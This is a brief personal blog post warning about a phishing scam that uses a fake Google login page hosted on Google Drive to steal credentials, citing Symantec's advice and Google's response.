I received an email yesterday that was a very clever piece of illegal scamming
When I looked further into how the scam works I got a surprise. Google Docs and Google Drive are the focus of a very sophisticated phishing scam that. This scam is more effective than the usual phishing messages we see every day because the Google Drive phishing page is actually served over SSL from the legitimate Google Drive service itself.
Most phishing mitigation focuses on visually inspecting the URL to make sure the connection is secure. And this is good advice, but this does not help prevent against this specific attack.
This phishing scam starts like many other phishing scams: with an email. The malicious message reportedly arrives with the subject line "Documents" and points to a Google Docs link. Again, it shows up in the address bar as a google.com domain and takes you to a fake log-in page that looks just like the real Google login page. This is how the hackers get you.
|Page where the Phishing email leads|
The email I received came from a legitimate customer who uses Google drive. When i clicked on the link I was brought to the page above. Once you log in through the fake page, you'll even be taken to an actual Google Doc. Your credentials will be sent to PHP script on a compromised server. You may never even know they've been swiped.
Not just phishing, but malware too
Symantec have advised users to enable Google's two-factor authentication and to use up-to-date security software on endpoints and gateways.
Symantec say they have contacted Google to seek advice and were given the following response
"We've removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password."
That was last March, I got the rogue email yesterday